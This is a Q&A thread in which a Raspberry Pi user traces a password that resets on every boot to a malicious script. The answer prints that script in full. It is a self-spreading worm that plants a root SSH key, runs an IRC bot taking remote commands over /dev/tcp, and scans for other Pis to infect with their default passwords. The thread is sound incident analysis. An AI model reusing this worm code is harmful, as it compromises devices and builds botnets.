# Investigation - user's password is lost in every reboot issue

Tags: password, trace

I'm investigating this issue: pi's password is lost in every reboot.
Issue summary: Change pi's password by passwd command -> reboot -> the changed password always will be changed to another which we don't know.

Yes, I know using default pi account is not good for security, but in this topic I just focus to the investigation of root cause.

After searching tons of result on Google (like these: https://raspberrypi.stackexchange.com/questions/73487/pis-password-is-lost-in-every-reboot and https://www.raspberrypi.org/forums/viewtopic.php?t=195378 etc...) but don't have the solution for this strangle issue, I decided to investigate by myself. And I have fond out a half of the root cause.

I used this command to trace auth log

```
sudo tail /var/log/auth.log -n 100
```

And I alway see this log at the shutdown step

```
May 19 01:02:41 raspberrypi usermod[866]: change user 'pi' password
```

Then I tried to rename *usermod* binary and shutdown

```
sudo mv /usr/sbin/usermod /usr/sbin/usermod-dell
```

Then it worked, the usermod binary wasn't called and the password of pi account isn't changed after rebooting anymore.
So, it means something called usermod to change the password of pi account, but I still can't trace exactly *something* is what?

This is full log of *auth.log -n 100* command.

```
rp@raspberrypi:~ $ sudo tail /var/log/auth.log -n 100
[sudo] password for rp:
May 19 00:19:20 raspberrypi sudo: pam_unix(sudo:session): session closed for use                                                                                        r root
May 19 00:19:31 raspberrypi sudo:       rp : TTY=pts/1 ; PWD=/home/rp ; USER=roo                                                                                        t ; COMMAND=/sbin/reboot
May 19 00:19:31 raspberrypi sudo: pam_unix(sudo:session): session opened for use                                                                                        r root by rp(uid=0)
May 19 00:19:38 raspberrypi systemd-logind[478]: New seat seat0.
May 19 00:19:39 raspberrypi sshd[847]: Server listening on 0.0.0.0 port 22.
May 19 00:19:39 raspberrypi sshd[847]: Server listening on :: port 22.
May 19 00:19:39 raspberrypi usermod[824]: change user 'pi' password
May 19 00:19:40 raspberrypi sshd[847]: Received SIGHUP; restarting.
May 19 00:19:41 raspberrypi sshd[847]: Server listening on 0.0.0.0 port 22.
May 19 00:19:41 raspberrypi sshd[847]: Server listening on :: port 22.
May 19 00:19:46 raspberrypi lightdm: pam_unix(lightdm-autologin:session): sessio                                                                                        n opened for user pi by (uid=0)
May 19 00:19:46 raspberrypi systemd-logind[478]: New session c1 of user pi.
May 19 00:19:46 raspberrypi systemd: pam_unix(systemd-user:session): session ope                                                                                        ned for user pi by (uid=0)
May 19 00:19:55 raspberrypi polkitd(authority=local): Registered Authentication                                                                                         Agent for unix-session:c1 (system bus name :1.12 [lxpolkit], object path /org/fr                                                                                        eedesktop/PolicyKit1/AuthenticationAgent, locale en_GB.UTF-8)
May 19 00:22:24 raspberrypi sudo:       pi : TTY=pts/0 ; PWD=/home/pi ; USER=roo                                                                                        t ; COMMAND=/usr/local/bin/noip2 -S
May 19 00:22:24 raspberrypi sudo: pam_unix(sudo:session): session opened for use                                                                                        r root by (uid=0)
May 19 00:22:24 raspberrypi sudo: pam_unix(sudo:session): session closed for use                                                                                        r root
May 19 00:22:36 raspberrypi passwd[2138]: pam_unix(passwd:chauthtok): authentica                                                                                        tion failure; logname= uid=1000 euid=0 tty= ruser= rhost=  user=pi
May 19 00:22:47 raspberrypi sudo:       pi : TTY=pts/0 ; PWD=/home/pi ; USER=roo                                                                                        t ; COMMAND=/usr/bin/passwd pi
May 19 00:22:47 raspberrypi sudo: pam_unix(sudo:session): session opened for use                                                                                        r root by (uid=0)
May 19 00:22:55 raspberrypi passwd[2152]: pam_unix(passwd:chauthtok): password c                                                                                        hanged for pi
May 19 00:22:55 raspberrypi sudo: pam_unix(sudo:session): session closed for use                                                                                        r root
May 19 00:23:11 raspberrypi passwd[2163]: pam_unix(passwd:chauthtok): password c                                                                                        hanged for pi
May 19 00:24:04 raspberrypi passwd[2235]: pam_unix(passwd:chauthtok): authentica                                                                                        tion failure; logname= uid=1000 euid=0 tty= ruser= rhost=  user=pi
May 19 00:24:43 raspberrypi passwd[2254]: pam_unix(passwd:chauthtok): password c                                                                                        hanged for pi
May 19 00:24:49 raspberrypi sudo:       pi : TTY=pts/0 ; PWD=/home/pi ; USER=roo                                                                                        t ; COMMAND=/sbin/reboot
May 19 00:24:50 raspberrypi sudo: pam_unix(sudo:session): session opened for use                                                                                        r root by (uid=0)
May 19 00:24:57 raspberrypi systemd-logind[477]: New seat seat0.
May 19 00:24:58 raspberrypi sshd[881]: Server listening on 0.0.0.0 port 22.
May 19 00:24:58 raspberrypi sshd[881]: Server listening on :: port 22.
May 19 00:24:58 raspberrypi usermod[861]: change user 'pi' password
May 19 00:25:03 raspberrypi lightdm: pam_unix(lightdm-autologin:session): sessio                                                                                        n opened for user pi by (uid=0)
May 19 00:25:04 raspberrypi systemd-logind[477]: New session c1 of user pi.
May 19 00:25:04 raspberrypi systemd: pam_unix(systemd-user:session): session ope                                                                                        ned for user pi by (uid=0)
May 19 00:25:11 raspberrypi polkitd(authority=local): Registered Authentication                                                                                         Agent for unix-session:c1 (system bus name :1.12 [lxpolkit], object path /org/fr                                                                                        eedesktop/PolicyKit1/AuthenticationAgent, locale en_GB.UTF-8)
May 19 00:26:56 raspberrypi passwd[2064]: pam_unix(passwd:chauthtok): authentica                                                                                        tion failure; logname= uid=1000 euid=0 tty= ruser= rhost=  user=pi
May 19 00:27:10 raspberrypi passwd[2068]: pam_unix(passwd:chauthtok): authentica                                                                                        tion failure; logname= uid=1000 euid=0 tty= ruser= rhost=  user=pi
May 19 00:39:01 raspberrypi CRON[8534]: pam_unix(cron:session): session opened f                                                                                        or user root by (uid=0)
May 19 00:39:02 raspberrypi CRON[8534]: pam_unix(cron:session): session closed f                                                                                        or user root
May 19 00:44:32 raspberrypi sshd[9696]: pam_unix(sshd:auth): authentication fail                                                                                        ure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.1.155  user=rp
May 19 00:44:34 raspberrypi sshd[9696]: Failed password for rp from 192.168.1.15                                                                                        5 port 51768 ssh2
May 19 00:44:41 raspberrypi sshd[9696]: Accepted password for rp from 192.168.1.                                                                                        155 port 51768 ssh2
May 19 00:44:41 raspberrypi sshd[9696]: pam_unix(sshd:session): session opened f                                                                                        or user rp by (uid=0)
May 19 00:44:41 raspberrypi systemd-logind[477]: New session c2 of user rp.
May 19 00:44:41 raspberrypi systemd: pam_unix(systemd-user:session): session ope                                                                                        ned for user rp by (uid=0)
May 19 00:44:57 raspberrypi sudo: pam_unix(sudo:auth): authentication failure; l                                                                                        ogname=rp uid=1003 euid=0 tty=/dev/pts/1 ruser=rp rhost=  user=rp
May 19 00:45:03 raspberrypi sudo:       rp : TTY=pts/1 ; PWD=/home/rp ; USER=roo                                                                                        t ; COMMAND=/usr/sbin/update-rc.d noip2.sh enable
May 19 00:45:03 raspberrypi sudo: pam_unix(sudo:session): session opened for use                                                                                        r root by rp(uid=0)
May 19 00:45:04 raspberrypi sudo: pam_unix(sudo:session): session closed for use                                                                                        r root
May 19 00:45:36 raspberrypi smbd[10031]: pam_unix(samba:session): session opened                                                                                         for user pi by (uid=0)
May 19 00:46:55 raspberrypi sudo:       rp : TTY=pts/1 ; PWD=/home/rp ; USER=roo                                                                                        t ; COMMAND=/usr/local/bin/noip2 -S
May 19 00:46:55 raspberrypi sudo: pam_unix(sudo:session): session opened for use                                                                                        r root by rp(uid=0)
May 19 00:46:55 raspberrypi sudo: pam_unix(sudo:session): session closed for use                                                                                        r root
May 19 00:49:17 raspberrypi sudo:       rp : TTY=pts/1 ; PWD=/home/rp ; USER=roo                                                                                        t ; COMMAND=/usr/bin/tail /var/log/auth.log -n 100
May 19 00:49:17 raspberrypi sudo: pam_unix(sudo:session): session opened for use                                                                                        r root by rp(uid=0)
May 19 00:49:17 raspberrypi sudo: pam_unix(sudo:session): session closed for use                                                                                        r root
May 19 00:51:24 raspberrypi sudo:       rp : TTY=pts/1 ; PWD=/home/rp ; USER=roo                                                                                        t ; COMMAND=/usr/bin/passwd pi
May 19 00:51:24 raspberrypi sudo: pam_unix(sudo:session): session opened for use                                                                                        r root by rp(uid=0)
May 19 00:51:30 raspberrypi passwd[11384]: pam_unix(passwd:chauthtok): password                                                                                         changed for pi
May 19 00:51:30 raspberrypi sudo: pam_unix(sudo:session): session closed for use                                                                                        r root
May 19 00:51:39 raspberrypi sudo:       rp : TTY=pts/1 ; PWD=/home/rp ; USER=roo                                                                                        t ; COMMAND=/sbin/reboot
May 19 00:51:39 raspberrypi sudo: pam_unix(sudo:session): session opened for use                                                                                        r root by rp(uid=0)
May 19 00:51:39 raspberrypi sshd[9696]: pam_unix(sshd:session): session closed f                                                                                        or user rp
May 19 00:51:47 raspberrypi systemd-logind[475]: New seat seat0.
May 19 00:51:48 raspberrypi sshd[882]: Server listening on 0.0.0.0 port 22.
May 19 00:51:48 raspberrypi sshd[882]: Server listening on :: port 22.
May 19 00:51:48 raspberrypi usermod[859]: change user 'pi' password
May 19 00:51:55 raspberrypi lightdm: pam_unix(lightdm-autologin:session): sessio                                                                                        n opened for user pi by (uid=0)
May 19 00:51:55 raspberrypi systemd-logind[475]: New session c1 of user pi.
May 19 00:51:55 raspberrypi systemd: pam_unix(systemd-user:session): session ope                                                                                        ned for user pi by (uid=0)
May 19 00:52:01 raspberrypi polkitd(authority=local): Registered Authentication                                                                                         Agent for unix-session:c1 (system bus name :1.12 [lxpolkit], object path /org/fr                                                                                        eedesktop/PolicyKit1/AuthenticationAgent, locale en_GB.UTF-8)
May 19 00:54:58 raspberrypi sshd[2091]: Accepted password for rp from 192.168.1.                                                                                        155 port 51869 ssh2
May 19 00:54:58 raspberrypi sshd[2091]: pam_unix(sshd:session): session opened f                                                                                        or user rp by (uid=0)
May 19 00:54:58 raspberrypi systemd-logind[475]: New session c2 of user rp.
May 19 00:54:58 raspberrypi systemd: pam_unix(systemd-user:session): session ope                                                                                        ned for user rp by (uid=0)
May 19 00:55:08 raspberrypi sudo:       rp : TTY=pts/0 ; PWD=/home/rp ; USER=roo                                                                                        t ; COMMAND=/usr/bin/tail /var/log/auth.log -n 100
May 19 00:55:08 raspberrypi sudo: pam_unix(sudo:session): session opened for use                                                                                        r root by rp(uid=0)
May 19 00:55:08 raspberrypi sudo: pam_unix(sudo:session): session closed for use                                                                                        r root
May 19 01:02:21 raspberrypi sudo:       rp : TTY=pts/0 ; PWD=/home/rp ; USER=roo                                                                                        t ; COMMAND=/usr/local/bin/noip2 -S
May 19 01:02:21 raspberrypi sudo: pam_unix(sudo:session): session opened for use                                                                                        r root by rp(uid=0)
May 19 01:02:21 raspberrypi sudo: pam_unix(sudo:session): session closed for use                                                                                        r root
May 19 01:02:33 raspberrypi sudo:       rp : TTY=pts/0 ; PWD=/home/rp ; USER=roo                                                                                        t ; COMMAND=/sbin/reboot
May 19 01:02:33 raspberrypi sudo: pam_unix(sudo:session): session opened for use                                                                                        r root by rp(uid=0)
May 19 01:02:33 raspberrypi sshd[2091]: pam_unix(sshd:session): session closed f                                                                                        or user rp
May 19 01:02:33 raspberrypi sudo: pam_unix(sudo:session): session closed for use                                                                                        r root
May 19 01:02:33 raspberrypi polkitd(authority=local): Unregistered Authenticatio                                                                                        n Agent for unix-session:c1 (system bus name :1.12, object path /org/freedesktop                                                                                        /PolicyKit1/AuthenticationAgent, locale en_GB.UTF-8) (disconnected from bus)
May 19 01:02:40 raspberrypi systemd-logind[480]: New seat seat0.
May 19 01:02:41 raspberrypi sshd[879]: Server listening on 0.0.0.0 port 22.
May 19 01:02:41 raspberrypi sshd[879]: Server listening on :: port 22.
May 19 01:02:41 raspberrypi usermod[866]: change user 'pi' password
May 19 01:02:47 raspberrypi lightdm: pam_unix(lightdm-autologin:session): sessio                                                                                        n opened for user pi by (uid=0)
May 19 01:02:47 raspberrypi systemd-logind[480]: New session c1 of user pi.
May 19 01:02:47 raspberrypi systemd: pam_unix(systemd-user:session): session ope                                                                                        ned for user pi by (uid=0)
May 19 01:02:53 raspberrypi polkitd(authority=local): Registered Authentication                                                                                         Agent for unix-session:c1 (system bus name :1.12 [lxpolkit], object path /org/fr                                                                                        eedesktop/PolicyKit1/AuthenticationAgent, locale en_GB.UTF-8)
May 19 01:04:53 raspberrypi sshd[2010]: Accepted password for rp from 192.168.1.                                                                                        155 port 51907 ssh2
May 19 01:04:53 raspberrypi sshd[2010]: pam_unix(sshd:session): session opened f                                                                                        or user rp by (uid=0)
May 19 01:04:53 raspberrypi systemd-logind[480]: New session c2 of user rp.
May 19 01:04:53 raspberrypi systemd: pam_unix(systemd-user:session): session ope                                                                                        ned for user rp by (uid=0)
May 19 01:05:01 raspberrypi sudo:       rp : TTY=pts/0 ; PWD=/home/rp ; USER=roo                                                                                        t ; COMMAND=/usr/bin/tail /var/log/auth.log -n 100
May 19 01:05:01 raspberrypi sudo: pam_unix(sudo:session): session opened for use
```

I tried to create a fake usermod bash below to debug

```
#!/bin/bash
(
echo "usermod called at $(date)"
echo "env"
env
echo
echo "command line"
echo "$@"
) >>/tmp/usermod.log
```

And this is the log result, but unfortunately I still can't trace exactly what called usermod?

```
usermod called at Sun 19 May 10:03:01 +07 2019
env
TERM=linux
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PWD=/
LANG=en_GB.UTF-8
SHLVL=2
_=/usr/bin/env

command line
-p $6$vGkGPKUr$heqvOhUzvbQ66Nb0JGCijh/81sG1WACcZgzPn8A0Wn58hHXWqy5yOgTlYJEbOjhk$
```

Comment: Either `grep -lr heqvOhUzvbQ66Nb0JGCijh /` to find what's calling your `usermod` instance, or capture `$PPID` and `ps -wef` in your fake `usermod` script and wait for it to be run again.

Answer (score 0):

Finally I have fond out it!! Windows Defender warns me this bash is a virus.

I used below bash to debug what called usermod.

```
#!/bin/bash
(
echo "usermod called at $(date)"
echo "env"
env
ps -p $PPID -o ruser,pid,ppid,cmd
echo
echo "command line"
echo "$@"
) >>/tmp/usermod.log
```

And this is the result

```
usermod called at Sun 19 May 14:26:41 +07 2019
env
TERM=linux
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PWD=/
LANG=en_GB.UTF-8
SHLVL=2
_=/usr/bin/env
RUSER      PID  PPID CMD
root       597   590 /bin/bash /opt/M8Zsr10D

command line
-p $6$vGkGPKUr$heqvOhUzvbQ66Nb0JGCijh/81sG1WACcZgzPn8A0Wn58hHXWqy5yOgTlYJEbOjhkHD0MRsAkfJgjU/ioCYDeR1 pi
```

/opt/M8Zsr10D content

```
#!/bin/bash    
MYSELF=`realpath $0`
DEBUG=/dev/null
echo $MYSELF >> $DEBUG

if [ "$EUID" -ne 0 ]
then 
    NEWMYSELF=`mktemp -u 'XXXXXXXX'`
    sudo cp $MYSELF /opt/$NEWMYSELF
    sudo sh -c "echo '#!/bin/sh -e' > /etc/rc.local"
    sudo sh -c "echo /opt/$NEWMYSELF >> /etc/rc.local"
    sudo sh -c "echo 'exit 0' >> /etc/rc.local"
    sleep 1
    sudo reboot
else
TMP1=`mktemp`
echo $TMP1 >> $DEBUG

killall bins.sh
killall minerd
killall node
killall nodejs
killall ktx-armv4l
killall ktx-i586
killall ktx-m68k
killall ktx-mips
killall ktx-mipsel
killall ktx-powerpc
killall ktx-sh4
killall ktx-sparc
killall arm5
killall zmap
killall kaiten
killall perl

echo "127.0.0.1 bins.deutschland-zahlung.eu" >> /etc/hosts
rm -rf /root/.bashrc
rm -rf /home/pi/.bashrc

usermod -p \$6\$vGkGPKUr\$heqvOhUzvbQ66Nb0JGCijh/81sG1WACcZgzPn8A0Wn58hHXWqy5yOgTlYJEbOjhkHD0MRsAkfJgjU/ioCYDeR1 pi

mkdir -p /root/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCl0kIN33IJISIufmqpqg54D6s4J0L7XV2kep0rNzgY1S1IdE8HDef7z1ipBVuGTygGsq+x4yVnxveGshVP48YmicQHJMCIljmn6Po0RMC48qihm/9ytoEYtkKkeiTR02c6DyIcDnX3QdlSmEqPqSNRQ/XDgM7qIB/VpYtAhK/7DoE8pqdoFNBU5+JlqeWYpsMO+qkHugKA5U22wEGs8xG2XyyDtrBcw10xz+M7U8Vpt0tEadeV973tXNNNpUgYGIFEsrDEAjbMkEsUw+iQmXg37EusEFjCVjBySGH3F+EQtwin3YmxbB9HRMzOIzNnXwCFaYU5JjTNnzylUBp/XB6B"  >> /root/.ssh/authorized_keys

echo "nameserver 8.8.8.8" >> /etc/resolv.conf
rm -rf /tmp/ktx*
rm -rf /tmp/cpuminer-multi
rm -rf /var/tmp/kaiten

cat > /tmp/public.pem <<EOFMARKER
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC/ihTe2DLmG9huBi9DsCJ90MJs
glv7y530TWw2UqNtKjPPA1QXvNsWdiLpTzyvk8mv6ObWBF8hHzvyhJGCadl0v3HW
rXneU1DK+7iLRnkI4PRYYbdfwp92nRza00JUR7P4pghG5SnRK+R/579vIiy+1oAF
WRq+Z8HYMvPlgSRA3wIDAQAB
-----END PUBLIC KEY-----
EOFMARKER

BOT=`mktemp -u 'XXXXXXXX'`

cat > /tmp/$BOT <<'EOFMARKER'
#!/bin/bash

SYS=`uname -a | md5sum | awk -F' ' '{print $1}'`
NICK=a${SYS:24}
while [ true ]; do

    arr[0]="ix1.undernet.org"
    arr[1]="ix2.undernet.org"
    arr[2]="Ashburn.Va.Us.UnderNet.org"
    arr[3]="Bucharest.RO.EU.Undernet.Org"
    arr[4]="Budapest.HU.EU.UnderNet.org"
    arr[5]="Chicago.IL.US.Undernet.org"
    rand=$[$RANDOM % 6]
    svr=${arr[$rand]}

    eval 'exec 3<>/dev/tcp/$svr/6667;'
    if [[ ! "$?" -eq 0 ]] ; then
            continue
    fi

    echo $NICK

    eval 'printf "NICK $NICK\r\n" >&3;'
    if [[ ! "$?" -eq 0 ]] ; then
            continue
    fi
    eval 'printf "USER user 8 * :IRC hi\r\n" >&3;'
    if [[ ! "$?" -eq 0 ]] ; then
        continue
    fi

    # Main loop
    while [ true ]; do
        eval "read msg_in <&3;"

        if [[ ! "$?" -eq 0 ]] ; then
            break
        fi

        if  [[ "$msg_in" =~ "PING" ]] ; then
            printf "PONG %s\n" "${msg_in:5}";
            eval 'printf "PONG %s\r\n" "${msg_in:5}" >&3;'
            if [[ ! "$?" -eq 0 ]] ; then
                break
            fi
            sleep 1
            eval 'printf "JOIN #biret\r\n" >&3;'
            if [[ ! "$?" -eq 0 ]] ; then
                break
            fi
        elif [[ "$msg_in" =~ "PRIVMSG" ]] ; then
            privmsg_h=$(echo $msg_in| cut -d':' -f 3)
            privmsg_data=$(echo $msg_in| cut -d':' -f 4)
            privmsg_nick=$(echo $msg_in| cut -d':' -f 2 | cut -d'!' -f 1)

            hash=`echo $privmsg_data | base64 -d -i | md5sum | awk -F' ' '{print $1}'`
            sign=`echo $privmsg_h | base64 -d -i | openssl rsautl -verify -inkey /tmp/public.pem -pubin`

            if [[ "$sign" == "$hash" ]] ; then
                CMD=`echo $privmsg_data | base64 -d -i`
                RES=`bash -c "$CMD" | base64 -w 0`
                eval 'printf "PRIVMSG $privmsg_nick :$RES\r\n" >&3;'
                if [[ ! "$?" -eq 0 ]] ; then
                    break
                fi
            fi
        fi
    done
done
EOFMARKER

chmod +x /tmp/$BOT
nohup /tmp/$BOT 2>&1 > /tmp/bot.log &
rm /tmp/nohup.log -rf
rm -rf nohup.out
sleep 3
rm -rf /tmp/$BOT

NAME=`mktemp -u 'XXXXXXXX'`

date > /tmp/.s

apt-get update -y --force-yes
apt-get install zmap sshpass -y --force-yes

while [ true ]; do
    FILE=`mktemp`
    zmap -p 22 -o $FILE -n 100000
    killall ssh scp
    for IP in `cat $FILE`
    do
        sshpass -praspberry scp -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no $MYSELF pi@$IP:/tmp/$NAME  && echo $IP >> /opt/.r && sshpass -praspberry ssh pi@$IP -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no "cd /tmp && chmod +x $NAME && bash -c ./$NAME" &
        sshpass -praspberryraspberry993311 scp -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no $MYSELF pi@$IP:/tmp/$NAME  && echo $IP >> /opt/.r && sshpass -praspberryraspberry993311 ssh pi@$IP -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no "cd /tmp && chmod +x $NAME && bash -c ./$NAME" &
    done
    rm -rf $FILE
    sleep 10
done

fi
```

Comment: You would do yourself a favour if you reinstalled that system from scratch, and changed all passwords that were ever used on that system. It looks like the intruder has had full root access to the system. Related: [How do I deal with a compromised server?](//serverfault.com/q/218005)

Comment: I second @Kusalananda's recommendation. You've found **a** thing that was installed on your Pi, but you have no idea what else was installed/modified. The only way to trust it again is to wipe it and rebuild from the ground up.

Comment: ... that also goes for any connected system to which access has been granted from the infected machine.

Comment: At least no you know why "*using default pi account is not good for security*" :) But if the RPi isn't directly on the internet, you have to wonder how it got hacked. Other systems around it may have been compromised.